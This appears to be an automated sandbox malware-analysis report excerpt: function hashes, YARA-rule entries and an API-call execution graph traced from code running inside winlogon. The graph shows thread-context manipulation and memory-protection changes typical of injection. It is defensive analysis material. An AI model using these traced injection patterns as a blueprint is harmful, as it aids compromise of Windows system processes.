                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1b0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                • Opcode ID: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction ID: 2bc3c3612cf833e2ad1c42e4024421941b8798db06fb65acfb60d4d2ae146d4e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C551CE33A4478886FB768F21D244B9877A0FB44B9CF988116DA8C47BD5CB7AC491C783
                                                                                                                                                                                                                                                Function 000001CA7D1E2F18 Relevance: 6.3, APIs: 5, Instructions: 93memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 756756679-0
                                                                                                                                                                                                                                                • Opcode ID: 787e2ccd3a4a2f0807cc7fcfab9808ef1bc99af934d1353d068844bd3f29b985
                                                                                                                                                                                                                                                • Instruction ID: 68331d0cdc66f6aa2e6d68a4811fc7f5493641d68d7da1d3c5fee51653f086a3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 787e2ccd3a4a2f0807cc7fcfab9808ef1bc99af934d1353d068844bd3f29b985
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02319F33B41B5982FA16CF56E940BA9B7A0BF44B89F884024DF4847B55EF36C4A18382
                                                                                                                                                                                                                                                Function 000001CA7D1F25C8 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                                                                                • Opcode ID: ef5328ec8df5305a5bebb05340c2e4b6dc17e77d604934f64985ec379b581ae8
                                                                                                                                                                                                                                                • Instruction ID: efef8ab2af5f90e34553b15d8f5b71952d393e6803cdbd5662c74e2bffbdfca9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef5328ec8df5305a5bebb05340c2e4b6dc17e77d604934f64985ec379b581ae8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FDD1DF33B06B8889F722CFA5D440AEC37A1FB4479CF944255CE5DA7B99DA35C406C782
                                                                                                                                                                                                                                                Function 000001CA7D1F2EF0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 953036326-0
                                                                                                                                                                                                                                                • Opcode ID: 43d1806d22cf26bb578584b1f50928cd79f72239213f1d2f409b9d03dcc02cf4
                                                                                                                                                                                                                                                • Instruction ID: dbe08f10fb5c2e532c7d3d17c5dfa145707cd442be3c723c69fc0ca6ecbec5da
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43d1806d22cf26bb578584b1f50928cd79f72239213f1d2f409b9d03dcc02cf4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9691EE73F5575885F7629F659480BED7BA0FB41B8CF94410ADE0A67A84DB36C482C383
                                                                                                                                                                                                                                                Function 000001CA7D1E7970 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                                • Opcode ID: c25137996cf865269d3dc01569cfdf526b316795659beb4b1a68d386b57b9efa
                                                                                                                                                                                                                                                • Instruction ID: 40f1ba51dad96662f11ac96ad467e4748dff922b32281caad37b3518e4389204
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c25137996cf865269d3dc01569cfdf526b316795659beb4b1a68d386b57b9efa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B115E32B55F048AFB01CF60E8557E833A4FB5975CF840E21EE6D827A4EB38C1598382
                                                                                                                                                                                                                                                Function 000001CA7D1E2544 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileType
                                                                                                                                                                                                                                                • String ID: \\.\pipe\
                                                                                                                                                                                                                                                • API String ID: 3081899298-91387939
                                                                                                                                                                                                                                                • Opcode ID: 2214ffb8d2229323086ad34a8b531e28ba158b85d1d3dbad5c7c70fb1dba52b7
                                                                                                                                                                                                                                                • Instruction ID: c0cb3b23a291a5e1c18388a5c5224d77e2cba80131e91876240bdf4a69042d32
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2214ffb8d2229323086ad34a8b531e28ba158b85d1d3dbad5c7c70fb1dba52b7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5271E737A4078981F776DF25D864BEA7794FB5878AFC1011EED0A43789DA36C9048783
                                                                                                                                                                                                                                                Function 000001CA7D1B7980 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2638967747.000001CA7D1B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1b0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 3242871069-1018135373
                                                                                                                                                                                                                                                • Opcode ID: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction ID: d18c1629867c212125edc142be5d28f2604b491033924c58c9a4cba8a7ca871d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B51E033B557088AFB55CF29E044FA87791FB40B9CF948124EA8E47788D73AC941CB82
                                                                                                                                                                                                                                                Function 000001CA7D1BA3C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2638967747.000001CA7D1B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1b0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallTranslator
                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                • API String ID: 3163161869-2084237596
                                                                                                                                                                                                                                                • Opcode ID: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction ID: 09c55af3b9974b52cb78c98aa51ab59259fefcd4d6a26ee8bae7806f44521c8a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3761C073904BC885E7328F15E540BDAB7A0FB89B98F444215EBCC43B99DB79C190CB42
                                                                                                                                                                                                                                                Function 000001CA7D1E2338 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileType
                                                                                                                                                                                                                                                • String ID: \\.\pipe\
                                                                                                                                                                                                                                                • API String ID: 3081899298-91387939
                                                                                                                                                                                                                                                • Opcode ID: ee842ef1b9af794ce5f9c57276e32575cf678b56a57e7c1674317c9bf9c17d00
                                                                                                                                                                                                                                                • Instruction ID: 792464171b4e510549dffe5492d106eee76e37af89db811b43d6c31c9ee4abde
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee842ef1b9af794ce5f9c57276e32575cf678b56a57e7c1674317c9bf9c17d00
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1512633A8478881F6268F29A564BEA7791FF86749FC40159DE4903B8ACA3BC40487C3
                                                                                                                                                                                                                                                Function 000001CA7D1F2C60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                • Opcode ID: 6a2d2f89dbe45a9fea545bcb4aa06eef1d3c7bdcbbdd9a8edf910a903994b9b4
                                                                                                                                                                                                                                                • Instruction ID: 3f69a4f911fd7435bf626cb3594783c82f57a32be013ebfb7e8e93df65a6d977
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a2d2f89dbe45a9fea545bcb4aa06eef1d3c7bdcbbdd9a8edf910a903994b9b4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7641C573716B4482EB21DF25E4447D977A1FB88788F804021EE4D87798EB3DC401C782
                                                                                                                                                                                                                                                Function 000001CA7D1E8A58 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                • Opcode ID: d7810ab3a0ec9818877cf1b3e283a106e6e962497adc233d094785ed36f44b7e
                                                                                                                                                                                                                                                • Instruction ID: afb6977eab6e0c94123a84478745c0422c43e9ef5b71f02b2ee91409bbc62b5d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7810ab3a0ec9818877cf1b3e283a106e6e962497adc233d094785ed36f44b7e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63112B33615B8482EB628B15F44069977E5FBC8B98F984224EB8D07B64EF3DC5518B41
                                                                                                                                                                                                                                                Function 000001CA7D1E1BFC Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 756756679-0
                                                                                                                                                                                                                                                • Opcode ID: 1e98e18f6346a7606d876eb22bc804523d63b476fed3d5047e07684f33477b56
                                                                                                                                                                                                                                                • Instruction ID: dced5fbc4efeb8eb5392c409e9291e4daa8df8c6572b07f196e14503489c10e8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e98e18f6346a7606d876eb22bc804523d63b476fed3d5047e07684f33477b56
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D511E776A02B4881FB05CF66A4046A977A1FFC9FC9F994064CE4D83765DF3AC482D382
                                                                                                                                                                                                                                                Function 000001CA7D1E1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1617791916-0
                                                                                                                                                                                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                                                                                • Instruction ID: da8c3dafd84f4e9d3148870d217228cf2e181fae1a96b4a2815fc4d2442c645c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8FE039B6A4270886FB058B62D80878A36E1FB89B0AF848024C90907351DF7EC899C792

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:1.2%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:1553
                                                                                                                                                                                                                                                Total number of Limit Nodes:8
                                                                                                                                                                                                                                                execution_graph 9005 265b3c0b706 9006 265b3c08c04 _CallSETranslator 4 API calls 9005->9006 9008 265b3c0b713 __CxxCallCatchBlock 9006->9008 9007 265b3c0b757 RaiseException 9009 265b3c0b77e 9007->9009 9008->9007 9018 265b3c0a014 9009->9018 9011 265b3c0b7af __CxxCallCatchBlock 9012 265b3c08c04 _CallSETranslator 4 API calls 9011->9012 9013 265b3c0b7c2 9012->9013 9014 265b3c08c04 _CallSETranslator 4 API calls 9013->9014 9016 265b3c0b7cb 9014->9016 9019 265b3c08c04 _CallSETranslator 4 API calls 9018->9019 9020 265b3c0a026 9019->9020 9021 265b3c08c04 _CallSETranslator 4 API calls 9020->9021 9023 265b3c0a061 9020->9023 9022 265b3c0a031 9021->9022 9022->9023 9024 265b3c08c04 _CallSETranslator 4 API calls 9022->9024 9025 265b3c0a052 9024->9025 9025->9011 9026 265b3c088d8 9025->9026 9027 265b3c08c04 _CallSETranslator 4 API calls 9026->9027 9028 265b3c088e6 9027->9028 9028->9011 9029 265b3c14308 9030 265b3c14319 CloseHandle 9029->9030 9031 265b3c1431f 9029->9031 9030->9031 8215 265b3c03788 8218 265b3c036dc 8215->8218 8219 265b3c036ef GetModuleHandleW 8218->8219 8220 265b3c03781 FreeLibraryAndExitThread 8218->8220 8221 265b3c03706 GetCurrentProcess VirtualProtectEx 8219->8221 8222 265b3c0376d TerminateThread 8219->8222 8221->8222 8223 265b3c03732 GetCurrentProcess VirtualProtectEx 8221->8223 8225 265b3c01e74 8222->8225 8223->8222 8252 265b3c05ac0 8225->8252 8229 265b3c01e90 8230 265b3c01eb0 8229->8230 8262 265b3c05720 GetCurrentThreadId 8229->8262 8231 265b3c01ed0 8230->8231 8233 265b3c05720 7 API calls 8230->8233 8234 265b3c01ef0 8231->8234 8235 265b3c05720 7 API calls 8231->8235 8233->8231 8236 265b3c01f10 8234->8236 8237 265b3c05720 7 API calls 8234->8237 8235->8234 8238 265b3c01f30 8236->8238 8239 265b3c05720 7 API calls 8236->8239 8237->8236 8240 265b3c01f50 8238->8240 8242 265b3c05720 7 API calls 8238->8242 8239->8238 8241 265b3c01f70 8240->8241 8243 265b3c05720 7 API calls 8240->8243 8244 265b3c01f90 8241->8244 8245 265b3c05720 7 API calls 8241->8245 8242->8240 8243->8241 8246 265b3c05720 7 API calls 8244->8246 8248 265b3c01fb0 8244->8248 8245->8244 8246->8248 8247 265b3c01fd0 8269 265b3c05b40 8247->8269 8248->8247 8249 265b3c05720 7 API calls 8248->8249 8249->8247 8251 265b3c05b3b 8251->8220 8253 265b3c01e82 GetCurrentThread 8252->8253 8254 265b3c05ad4 8252->8254 8256 265b3c05fe0 8253->8256 8254->8253 8292 265b3c05040 8254->8292 8257 265b3c05ffd 8256->8257 8261 265b3c05ff2 8256->8261 8257->8261 8297 265b3c0787c 8257->8297 8259 265b3c0601a 8260 265b3c0608d GetLastError 8259->8260 8259->8261 8260->8261 8261->8229 8263 265b3c0574d 8262->8263 8265 265b3c05743 8262->8265 8264 265b3c0787c 4 API calls 8263->8264 8263->8265 8266 265b3c057c1 type_info::_name_internal_method 8264->8266 8265->8230 8266->8265 8267 265b3c058d0 VirtualProtect 8266->8267 8267->8265 8268 265b3c058f9 GetLastError 8267->8268 8268->8265 8270 265b3c05b69 8269->8270 8271 265b3c05b7b GetCurrentThreadId 8269->8271 8270->8271 8272 265b3c05b88 8271->8272 8273 265b3c05b92 8271->8273 8345 265b3c07950 8272->8345 8274 265b3c05b9b 8273->8274 8282 265b3c05bab 8273->8282 8329 265b3c05970 GetCurrentThreadId 8274->8329 8277 265b3c05fcf 8277->8251 8278 265b3c05ccc GetThreadContext 8279 265b3c05e2a 8278->8279 8280 265b3c05cf2 8278->8280 8284 265b3c05f0e 8279->8284 8285 265b3c05e51 VirtualProtect FlushInstructionCache 8279->8285 8280->8279 8281 265b3c05d19 8280->8281 8283 265b3c05d9d 8281->8283 8289 265b3c05d76 SetThreadContext 8281->8289 8282->8278 8282->8279 8283->8251 8286 265b3c05f2e 8284->8286 8337 265b3c043f0 8284->8337 8285->8279 8341 265b3c04e00 GetCurrentProcess 8286->8341 8289->8283 8290 265b3c05f47 ResumeThread 8291 265b3c05f33 8290->8291 8291->8272 8291->8290 8293 265b3c05052 8292->8293 8294 265b3c05068 VirtualProtect 8293->8294 8295 265b3c0508f 8293->8295 8294->8293 8296 265b3c05086 GetLastError 8294->8296 8295->8253 8296->8295 8298 265b3c07887 8297->8298 8299 265b3c078a0 8298->8299 8301 265b3c078a6 8298->8301 8306 265b3c0bdcc 8298->8306 8299->8259 8302 265b3c078b1 8301->8302 8309 265b3c08098 8301->8309 8313 265b3c080b8 8302->8313 8317 265b3c0be0c 8306->8317 8310 265b3c080a6 std::bad_alloc::bad_alloc 8309->8310 8324 265b3c08a58 8310->8324 8312 265b3c080b7 8314 265b3c080c6 std::bad_alloc::bad_alloc 8313->8314 8315 265b3c08a58 Concurrency::cancel_current_task 2 API calls 8314->8315 8316 265b3c078b7 8315->8316 8322 265b3c0cf0c EnterCriticalSection 8317->8322 8323 265b3c16240 8322->8323 8325 265b3c08a77 8324->8325 8326 265b3c08aa0 RtlPcToFileHeader 8325->8326 8327 265b3c08ac2 RaiseException 8325->8327 8328 265b3c08ab8 8326->8328 8327->8312 8328->8327 8330 265b3c05981 8329->8330 8333 265b3c0598b 8329->8333 8330->8272 8331 265b3c05a35 8334 265b3c04e00 3 API calls 8331->8334 8332 265b3c059a3 VirtualProtect 8332->8333 8333->8331 8333->8332 8336 265b3c05a45 8334->8336 8335 265b3c05a59 ResumeThread 8335->8336 8336->8330 8336->8335 8339 265b3c0440c 8337->8339 8338 265b3c0446f 8338->8286 8339->8338 8340 265b3c04422 VirtualFree 8339->8340 8340->8339 8342 265b3c04e1c 8341->8342 8343 265b3c04e32 VirtualProtect FlushInstructionCache 8342->8343 8344 265b3c04e63 8342->8344 8343->8342 8344->8291 8346 265b3c07959 8345->8346 8347 265b3c07964 8346->8347 8348 265b3c08128 IsProcessorFeaturePresent 8346->8348 8347->8277 8349 265b3c08140 8348->8349 8352 265b3c0831c RtlCaptureContext 8349->8352 8351 265b3c08153 8351->8277 8353 265b3c08336 capture_previous_context 8352->8353 8353->8351 9719 265b3c0e00c 9720 265b3c0e031 9719->9720 9729 265b3c0e048 9719->9729 9721 265b3c0dc1c __std_exception_copy 7 API calls 9720->9721 9723 265b3c0e036 9721->9723 9722 265b3c0e100 9725 265b3c0c46c 7 API calls 9722->9725 9724 265b3c0dae0 _invalid_parameter_noinfo 20 API calls 9723->9724 9726 265b3c0e041 9724->9726 9727 265b3c0e158 9725->9727 9730 265b3c0e160 9727->9730 9739 265b3c0e192 9727->9739 9729->9722 9734 265b3c0e095 9729->9734 9735 265b3c0e0d8 9729->9735 9749 265b3c0e250 9729->9749 9732 265b3c0dcb4 __free_lconv_num 7 API calls 9730->9732 9731 265b3c0e1f1 9733 265b3c0dcb4 __free_lconv_num 7 API calls 9731->9733 9736 265b3c0e167 9732->9736 9738 265b3c0e1fc 9733->9738 9737 265b3c0e0b8 9734->9737 9744 265b3c0dcb4 __free_lconv_num 7 API calls 9734->9744 9735->9737 9742 265b3c0dcb4 __free_lconv_num 7 API calls 9735->9742 9736->9737 9740 265b3c0dcb4 __free_lconv_num 7 API calls 9736->9740 9743 265b3c0dcb4 __free_lconv_num 7 API calls 9737->9743 9741 265b3c0e215 9738->9741 9745 265b3c0dcb4 __free_lconv_num 7 API calls 9738->9745 9739->9731 9739->9739 9748 265b3c0e237 9739->9748 9769 265b3c114c0 9739->9769 9740->9736 9746 265b3c0dcb4 __free_lconv_num 7 API calls 9741->9746 9742->9735 9743->9726 9744->9734 9745->9738 9746->9726 9750 265b3c0e27e 9749->9750 9750->9750 9751 265b3c0dc3c _invalid_parameter_noinfo 7 API calls 9750->9751 9752 265b3c0e2c9 9751->9752 9753 265b3c114c0 20 API calls 9752->9753 9754 265b3c0e2ff 9753->9754 9755 265b3c0e724 17 API calls 9754->9755 9756 265b3c0e4b6 9755->9756 9757 265b3c0fb18 3 API calls 9756->9757 9758 265b3c0e4e1 9757->9758 9778 265b3c0dd04 9758->9778 9761 265b3c0e57d 9762 265b3c0e724 17 API calls 9761->9762 9763 265b3c0e5ad 9762->9763 9764 265b3c0fb18 3 API calls 9763->9764 9765 265b3c0e5d6 9764->9765 9799 265b3c0de80 9765->9799 9768 265b3c0e250 24 API calls 9773 265b3c114dd 9769->9773 9770 265b3c114e2 9771 265b3c114f8 9770->9771 9772 265b3c0dc1c __std_exception_copy 7 API calls 9770->9772 9771->9739 9774 265b3c114ec 9772->9774 9773->9770 9773->9771 9776 265b3c1152c 9773->9776 9775 265b3c0dae0 _invalid_parameter_noinfo 20 API calls 9774->9775 9775->9771 9776->9771 9777 265b3c0dc1c __std_exception_copy 7 API calls 9776->9777 9777->9774 9779 265b3c0dd2e 9778->9779 9780 265b3c0dd52 9778->9780 9784 265b3c0dcb4 __free_lconv_num 7 API calls 9779->9784 9786 265b3c0dd3d FindFirstFileExW 9779->9786 9781 265b3c0dd57 9780->9781 9782 265b3c0ddac 9780->9782 9781->9786 9787 265b3c0dd6c 9781->9787 9789 265b3c0dcb4 __free_lconv_num 7 API calls 9781->9789 9783 265b3c0f5ec MultiByteToWideChar 9782->9783 9785 265b3c0ddc8 9783->9785 9784->9786 9791 265b3c0ddfd 9785->9791 9792 265b3c0dcb4 __free_lconv_num 7 API calls 9785->9792 9794 265b3c0ddcf __vcrt_InitializeCriticalSectionEx 9785->9794 9796 265b3c0de0a 9785->9796 9786->9761 9788 265b3c0cf7c 7 API calls 9787->9788 9788->9786 9789->9787 9790 265b3c0f5ec MultiByteToWideChar 9790->9794 9793 265b3c0cf7c 7 API calls 9791->9793 9792->9791 9793->9796 9794->9786 9795 265b3c0db90 7 API calls 9794->9795 9797 265b3c0dddc 9795->9797 9796->9786 9796->9790 9798 265b3c0dc1c __std_exception_copy 7 API calls 9797->9798 9798->9786 9800 265b3c0deaa 9799->9800 9801 265b3c0dece 9799->9801 9802 265b3c0deb9 9800->9802 9805 265b3c0dcb4 __free_lconv_num 7 API calls 9800->9805 9803 265b3c0df28 9801->9803 9804 265b3c0ded4 9801->9804 9802->9768 9809 265b3c0df53 __vcrt_InitializeCriticalSectionEx 9803->9809 9810 265b3c0df84 9803->9810 9811 265b3c0dcb4 __free_lconv_num 7 API calls 9803->9811 9804->9802 9806 265b3c0dcb4 __free_lconv_num 7 API calls 9804->9806 9808 265b3c0dee9 9804->9808 9805->9802 9806->9808 9807 265b3c0cf7c 7 API calls 9807->9802 9808->9807 9809->9802 9813 265b3c0db90 7 API calls 9809->9813 9812 265b3c0cf7c 7 API calls 9810->9812 9811->9810 9812->9809 9814 265b3c0df60 9813->9814 9815 265b3c0dc1c __std_exception_copy 7 API calls 9814->9815 9815->9802 9816 265b3c0b60c 9817 265b3c08c04 _CallSETranslator 4 API calls 9816->9817 9818 265b3c0b641 9817->9818 9819 265b3c08c04 _CallSETranslator 4 API calls 9818->9819 9820 265b3c0b64f __except_validate_context_record 9819->9820 9821 265b3c08c04 _CallSETranslator 4 API calls 9820->9821 9822 265b3c0b693 9821->9822 9823 265b3c08c04 _CallSETranslator 4 API calls 9822->9823 9824 265b3c0b69c 9823->9824 9825 265b3c08c04 _CallSETranslator 4 API calls 9824->9825 9826 265b3c0b6a5 9825->9826 9839 265b3c09fd8 9826->9839 9829 265b3c08c04 _CallSETranslator 4 API calls 9830 265b3c0b6d5 __CxxCallCatchBlock 9829->9830 9831 265b3c0a014 __CxxCallCatchBlock 4 API calls 9830->9831 9832 